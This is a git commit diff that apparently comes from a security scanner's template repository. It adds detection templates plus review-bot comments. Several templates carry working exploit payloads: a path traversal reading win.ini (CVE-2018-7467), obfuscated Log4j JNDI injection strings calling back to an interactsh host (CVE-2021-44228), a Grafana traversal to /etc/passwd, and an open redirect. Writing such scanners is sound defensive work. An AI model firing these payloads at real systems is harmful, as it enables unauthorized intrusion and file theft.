Merge branch 'master' into master

patch-1
Evan Rubinstein 2021-12-13 05:07:57 -05:00 committed by GitHub
commit 030cfe89b9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
11 changed files with 1517 additions and 1103 deletions


@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 920 | daffainfo | 348 | cves | 926 | info | 912 | http | 2503 | | cve | 921 | daffainfo | 354 | cves | 927 | info | 918 | http | 2512 |
| lfi | 382 | dhiyaneshdk | 341 | vulnerabilities | 350 | high | 695 | file | 57 | | lfi | 382 | dhiyaneshdk | 342 | vulnerabilities | 352 | high | 695 | file | 57 |
| panel | 319 | pikpikcu | 286 | exposed-panels | 319 | medium | 527 | network | 47 | | panel | 321 | pikpikcu | 287 | exposed-panels | 321 | medium | 528 | network | 47 |
| xss | 289 | pdteam | 216 | technologies | 225 | critical | 324 | dns | 12 | | xss | 290 | pdteam | 216 | technologies | 226 | critical | 326 | dns | 12 |
| wordpress | 270 | geeknik | 172 | exposures | 196 | low | 166 | | | | wordpress | 270 | geeknik | 172 | exposures | 196 | low | 166 | | |
| exposure | 250 | dwisiswant0 | 157 | misconfiguration | 164 | | | | | | exposure | 250 | dwisiswant0 | 158 | misconfiguration | 164 | | | | |
| rce | 230 | gy741 | 90 | token-spray | 130 | | | | | | rce | 231 | gy741 | 91 | token-spray | 133 | | | | |
| tech | 228 | pussycat0x | 90 | takeovers | 65 | | | | | | tech | 230 | pussycat0x | 91 | takeovers | 65 | | | | |
| cve2021 | 191 | 0x_akoko | 77 | default-logins | 63 | | | | | | cve2021 | 192 | 0x_akoko | 77 | default-logins | 63 | | | | |
| wp-plugin | 186 | princechaddha | 72 | file | 57 | | | | | | wp-plugin | 186 | princechaddha | 72 | file | 57 | | | | |
**192 directories, 2689 files**. **192 directories, 2700 files**.
</td> </td>
</tr> </tr>



@ -1,5 +1,5 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------
| cve | 921 | daffainfo | 348 | cves | 927 | info | 912 | http | 2504 | | cve | 921 | daffainfo | 348 | cves | 927 | info | 912 | http | 2504 |
| lfi | 382 | dhiyaneshdk | 341 | vulnerabilities | 350 | high | 695 | file | 57 | | lfi | 382 | dhiyaneshdk | 341 | vulnerabilities | 350 | high | 695 | file | 57 |
| panel | 319 | pikpikcu | 286 | exposed-panels | 319 | medium | 527 | network | 47 | | panel | 319 | pikpikcu | 286 | exposed-panels | 319 | medium | 527 | network | 47 |


@ -0,0 +1,31 @@
id: CVE-2018-7467
info:
name: AxxonSoft Axxon Next Directory Traversal
author: 0x_Akoko
severity: high
description: AxxonSoft Axxon Next suffers from a directory traversal vulnerability.
reference:
- https://packetstormsecurity.com/files/146604/AxxonSoft-Axxon-Next-Directory-Traversal.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-7467
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-7467
cwe-id: CWE-200
tags: cve,cve2018,axxonsoft,lfi
requests:
- raw:
- |+
GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini HTTP/1.1
Host: {{Hostname}}
unsafe: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
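Review bot: The classification block tags this as `cwe-id: CWE-200`, but the request at L61 is a classic `..%2f` path traversal, which NVD normally files under CWE-22 — check the linked NVD entry and correct the id if it disagrees. The probe only ever reads `windows\win.ini`, so a vulnerable deployment on a non-Windows host will never produce the three win.ini markers the `and` matcher needs; say so in the description or add a `/etc/passwd` variant if the product supports it. The raw request carries no credentials, so the template presupposes the traversal is reachable without authentication; the one-line description at L48 should state that explicitly, e.g. `description: AxxonSoft Axxon Next allows unauthenticated directory traversal via an encoded path under /css/, letting a remote attacker read arbitrary files on the Windows host.`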


@ -0,0 +1,41 @@
id: CVE-2021-44228
info:
name: Remote code injection in Log4j
author: melbadry9,dhiyaneshDK,daffainfo
severity: critical
description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
reference:
- https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
tags: cve,cve2021,rce,oast,log4j
requests:
- raw:
- |
GET /?x=${jndi:ldap://${hostName}.{{interactsh-url}}/a} HTTP/1.1
Host: {{Hostname}}
User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.{{interactsh-url}}}
Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
X-Forwarded-For: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
Authentication: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-z0-9\.\-]+)\.([a-z0-9]+)\.interactsh\.com'
extractors:
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-z0-9\.\-]+)\.([a-z0-9]+)\.interactsh\.com' # Extract ${hostName}
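Review bot: The second matcher at L102-L105 hardcodes `\.interactsh\.com`, and because `matchers-condition: and` requires both matchers, a scan run against a self-hosted OAST server (`-iserver`) will observe the DNS callback in the first matcher and still report no finding. The DNS-protocol matcher already proves the JNDI lookup fired; the regex only confirms the `${hostName}` substitution, which belongs in the extractor as best-effort rather than as a gating condition — drop the regex matcher and add a comment on the extractor such as `# assumes the public interactsh.com server; self-hosted -iserver domains will not match`. Note also that every payload leaks the target's hostname to whichever OAST server is in use, which is exactly the case where engagements use a private server. Separately, `Authentication:` at L95 is not a standard header name; presumably `Authorization:` was intended, though any header a logger records works as a vector.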


@ -0,0 +1,31 @@
id: aerohive-netconfig-ui
info:
name: Aerohive NetConfig UI
author: pussycat0x
severity: info
metadata:
shodan-dork: 'http.title:"Aerohive NetConfig UI"'
tags: panel,tech,hiveos,aerohive
requests:
- method: GET
path:
- "{{BaseURL}}/index.php5"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Aerohive NetConfig UI</title>'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- 'version" align="right" valign="bottom">([0-9.a-z]+)<\/td>'


@ -0,0 +1,32 @@
id: extreme-netconfig-ui
info:
name: Extreme NetConfig UI
author: pussycat0x
severity: info
metadata:
shodan-dork: 'http.title:"Extreme NetConfig UI"'
tags: panel,tech,hiveos,extreme
requests:
- method: GET
path:
- "{{BaseURL}}/index.php5"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Extreme NetConfig UI</title>'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- 'version" align="right" valign="bottom">([0-9.a-z]+)<\/td>'
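Review bot: The `condition: and` at L165 is redundant on a single-entry `words` list and is the only line separating this template from `aerohive-netconfig-ui` in the same commit — both request `/index.php5`, require status 200 and use the identical version extractor at L174. Drop the stray `condition: and`; if maintainers accept it, the two could instead be one template whose word matcher lists both titles with `condition: or`, which halves the requests per host for what appears to be the same NetConfig UI under two brands.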


@ -0,0 +1,30 @@
id: xds-amr-status
info:
name: XDS-AMR - status
author: pussycat0x
severity: info
metadata:
shodan-dork: 'http.title:"XDS-AMR - status"'
tags: panel,tech,xamr,xds
requests:
- method: GET
path:
- "{{BaseURL}}/login.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>XDS-AMR - Status</title>'
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- 'XAMR\-([0-9]+)'
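Review bot: The word matcher at L196 looks for `<title>XDS-AMR - Status</title>` while the shodan dork at L185 searches for `"XDS-AMR - status"`; nuclei word matchers are case-sensitive by default, so if the live page uses the dork's lowercase form the template never fires. Either confirm the real title casing or add `case-insensitive: true` under the word matcher. The extractor at L201-L204 also omits the `group: 1` that the two sibling panel templates in this commit use, so it emits `XAMR-<digits>` rather than the number alone — fine if intended, but worth stating.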


@ -0,0 +1,257 @@
abhisant-druid-datasource
aceiot-svg-panel
ae3e-plotly-panel
agenty-flowcharting-panel
aidanmountford-html-panel
akumuli-datasource
alertlist
alexanderzobnin-zabbix-app
alexandra-trackmap-panel
andig-darksky-datasource
annolist
anodot-datasource
anodot-panel
aquaqanalytics-kdbadaptor-datasource
auxmoney-waterfall-panel
ayoungprogrammer-finance-datasource
barchart
bargauge
belugacdn-app
bessler-pictureit-panel
bilibala-echarts-panel
blackmirror1-singlestat-math-panel
blackmirror1-statusbygroup-panel
bmchelix-ade-datasource
bosun-app
briangann-datatable-panel
briangann-gauge-panel
camptocamp-prometheus-alertmanager-datasource
candlestick
ccin2p3-riemann-datasource
citilogics-geoloop-panel
clarity89-finnhub-datasource
cloudflare-app
cloudspout-button-panel
cloudwatch
cognitedata-datasource
corpglory-progresslist-panel
dalmatinerdb-datasource
dalvany-image-panel
dashlist
ddurieux-glpi-app
devicehive-devicehive-datasource
devopsprodigy-kubegraf-app
digiapulssi-breadcrumb-panel
digiapulssi-organisations-panel
digrich-bubblechart-panel
dlopes7-appdynamics-datasource
doitintl-bigquery-datasource
elasticsearch
factry-untimely-panel
farski-blendstat-panel
fastweb-openfalcon-datasource
fatcloud-windrose-panel
fetzerch-sunandmoon-datasource
fifemon-graphql-datasource
flaminggoat-maptrack3d-panel
flant-statusmap-panel
foursquare-clouderamanager-datasource
frser-sqlite-datasource
fzakaria-simple-annotations-datasource
gapit-htmlgraphics-panel
gauge
geomap
gettingstarted
gnocchixyz-gnocchi-datasource
goshposh-metaqueries-datasource
gowee-traceroutemap-panel
grafadruid-druid-datasource
grafana-athena-datasource
grafana-azure-data-explorer-datasource
grafana-azure-monitor-datasource
grafana-clickhouse-datasource
grafana-clock-panel
grafana-datadog-datasource
grafana-discourse-datasource
grafana-dynatrace-datasource
grafana-enterprise-logs-app
grafana-enterprise-traces-app
grafana-es-open-distro-datasource
grafana-github-datasource
grafana-gitlab-datasource
grafana-googlesheets-datasource
grafana-guidedtour-panel
grafana-honeycomb-datasource
grafana-image-renderer
grafana-iot-sitewise-datasource
grafana-iot-twinmaker-app
grafana-jira-datasource
grafana-k6cloud-datasource
grafana-kairosdb-datasource
grafana-metrics-enterprise-app
grafana-mongodb-datasource
grafana-newrelic-datasource
grafana-opcua-datasource
grafana-opensearch-datasource
grafana-oracle-datasource
grafana-piechart-panel
grafana-polystat-panel
grafana-redshift-datasource
grafana-salesforce-datasource
grafana-saphana-datasource
grafana-sentry-datasource
grafana-servicenow-datasource
grafana-simple-json-datasource
grafana-singlestat-panel
grafana-snowflake-datasource
grafana-splunk-datasource
grafana-splunk-monitoring-datasource
grafana-strava-datasource
grafana-synthetic-monitoring-app
grafana-timestream-datasource
grafana-wavefront-datasource
grafana-worldmap-panel
grafana-x-ray-datasource
graph
graphite
gretamosa-topology-panel
gridprotectionalliance-openhistorian-datasource
gridprotectionalliance-osisoftpi-datasource
groonga-datasource
hadesarchitect-cassandra-datasource
hawkular-datasource
heatmap
histogram
humio-datasource
ibm-apm-datasource
influxdb
innius-grpc-datasource
innius-video-panel
instana-datasource
integrationmatters-comparison-panel
isaozler-paretochart-panel
itrs-hub-datasource
jaeger
jasonlashua-prtg-datasource
jdbranham-diagram-panel
jeanbaptistewatenberg-percent-panel
larona-epict-panel
lightstep-metrics-datasource
linksmart-hds-datasource
linksmart-sensorthings-datasource
logs
loki
macropower-analytics-panel
magnesium-wordcloud-panel
marcuscalidus-svg-panel
marcusolsson-calendar-panel
marcusolsson-csv-datasource
marcusolsson-dynamictext-panel
marcusolsson-gantt-panel
marcusolsson-hexmap-panel
marcusolsson-hourly-heatmap-panel
marcusolsson-json-datasource
marcusolsson-static-datasource
marcusolsson-treemap-panel
meteostat-meteostat-datasource
michaeldmoore-annunciator-panel
michaeldmoore-multistat-panel
michaeldmoore-scatter-panel
monasca-datasource
monitoringartist-monitoringart-datasource
moogsoft-aiops-app
mssql
mtanda-google-calendar-datasource
mtanda-heatmap-epoch-panel
mtanda-histogram-panel
mxswat-separator-panel
mysql
natel-discrete-panel
natel-influx-admin-panel
natel-plotly-panel
natel-usgs-datasource
neocat-cal-heatmap-panel
netsage-sankey-panel
news
nodeGraph
novalabs-annotations-panel
novatec-sdg-panel
ntop-ntopng-datasource
oci-logs-datasource
oci-metrics-datasource
opennms-helm-app
opentsdb
ovh-warp10-datasource
paytm-kapacitor-datasource
percona-percona-app
petrslavotinek-carpetplot-panel
piechart
pierosavi-imageit-panel
pixie-pixie-datasource
pluginlist
postgres
pr0ps-trackmap-panel
praj-ams-datasource
prometheus
pue-solr-datasource
pyroscope-datasource
pyroscope-panel
quasardb-datasource
rackerlabs-blueflood-datasource
radensolutions-netxms-datasource
redis-app
redis-datasource
redis-explorer-app
ryantxu-ajax-panel
ryantxu-annolist-panel
satellogic-3d-globe-panel
savantly-heatmap-panel
sbueringer-consul-datasource
scadavis-synoptic-panel
sebastiangunreben-cdf-panel
sidewinder-datasource
simpod-json-datasource
singlestat
skydive-datasource
smartmakers-trafficlight-panel
sni-pnp-datasource
sni-thruk-datasource
snuids-radar-panel
snuids-svg-panel
snuids-trafficlights-panel
speakyourcode-button-panel
spotify-heroic-datasource
sskgo-perfcurve-panel
stackdriver
stagemonitor-elasticsearch-app
stat
state-timeline
status-histor
streamr-datasource
table
table-old
teamviewer-datasource
tempo
tencentcloud-monitor-app
testdata
text
thalysantana-appcenter-datasource
thiagoarrais-matomotracking-panel
timeseries
udoprog-heroic-datasource
vertamedia-clickhouse-datasource
vertica-grafana-datasource
verticle-flowhook-datasource
volkovlabs-image-panel
vonage-status-panel
voxter-app
welcome
williamvenner-timepickerbuttons-panel
woutervh-mapbox-panel
xginn8-pagerduty-datasource
yesoreyeram-boomtable-panel
yesoreyeram-boomtheme-panel
yesoreyeram-infinity-datasource
yeya24-chaosmesh-datasource
zipkin
zuburqan-parity-report-panel
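Review bot: The entry `status-histor` at L437 is truncated; the inline list this wordlist replaces in `grafana-file-read.yaml` (removed side of the same commit) carried `status-history`, so moving to the file silently drops a core Grafana plugin slug that was previously probed. Change L437 to `status-history`. Everything else from the old inline list is present, so this appears to be the only regression.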


@ -2,7 +2,7 @@ id: grafana-file-read
info: info:
name: Grafana v8.x Arbitrary File Read name: Grafana v8.x Arbitrary File Read
author: z0ne,dhiyaneshDk,jeya.seelan author: z0ne,dhiyaneshDk,jeya.seelan,dwisiswant0
severity: high severity: high
reference: reference:
- https://nosec.org/home/detail/4914.html - https://nosec.org/home/detail/4914.html
@ -14,51 +14,12 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../../../../../../../../../../../../../../../etc/passwd" - "{{BaseURL}}/public/plugins/{{pluginSlug}}/../../../../../../../../../../../../../../../../../../../etc/passwd"
payloads: payloads:
plugin-id: pluginSlug: helpers/wordlists/grafana-plugins.txt
- alertlist
- annolist
- barchart
- bargauge
- candlestick
- cloudwatch
- dashlist
- elasticsearch
- gauge
- geomap
- gettingstarted
- grafana-azure-monitor-datasource
- graph
- heatmap
- histogram
- influxdb
- jaeger
- logs
- loki
- mssql
- mysql
- news
- nodeGraph
- opentsdb
- piechart
- pluginlist
- postgres
- prometheus
- stackdriver
- stat
- state-timeline
- status-history
- table
- table-old
- tempo
- testdata
- text
- timeseries
- welcome
- zipkin
threads: 50
stop-at-first-match: true stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
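Review bot: The hunk removes `threads: 50` at L523 without replacement while the payload list grows from 40 inline slugs to the 257-entry wordlist, so unless nuclei's default payload concurrency is already acceptable each non-vulnerable host now costs up to 257 sequential-ish requests before `stop-at-first-match` gives up; restoring `threads: 50` under `payloads` keeps the previous throughput. The `helpers/wordlists/grafana-plugins.txt` path at L482 is relative and is presumably resolved against the templates root, so a run that points `-t` at this single file outside the repo layout may fail to load payloads — worth a comment such as `# path is relative to the nuclei-templates root`. The template's matchers continue outside the hunk.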


@ -0,0 +1,22 @@
id: pieregister-open-redirect
info:
name: Pie Register < 3.7.2.4 - Open Redirect
severity: low
author: 0x_Akoko
description: The plugin passes unvalidated user input to the wp_redirect() function, without validating it, leading to an Open redirect issue.
reference:
- https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4
- https://wordpress.org/plugins/pie-register/
tags: wordpress,redirect,wp-plugin,pieregister
requests:
- method: GET
path:
- "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
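Review bot: The only matcher at L546-L549 checks for a `Location` header pointing at example.com but never checks the response status, so any 200 page that happens to echo a Location header would be reported as an open redirect; pair it with a status matcher under `matchers-condition: and`. Since nuclei does not follow redirects unless `redirects: true` is set, the 3xx from `wp_redirect()` stays visible to the matcher. The description at L536 also says "unvalidated" and "without validating it" in the same sentence; `description: The plugin passes the redirect_to parameter to wp_redirect() without validating it, leading to an open redirect.` reads better. This appears to be the template's last line; if the file continues, the status matcher goes alongside the existing one.
```yaml
matchers-condition: and
matchers:
  - type: status
    status:
      - 301
      - 302
  # … unchanged: existing Location header regex matcher …
```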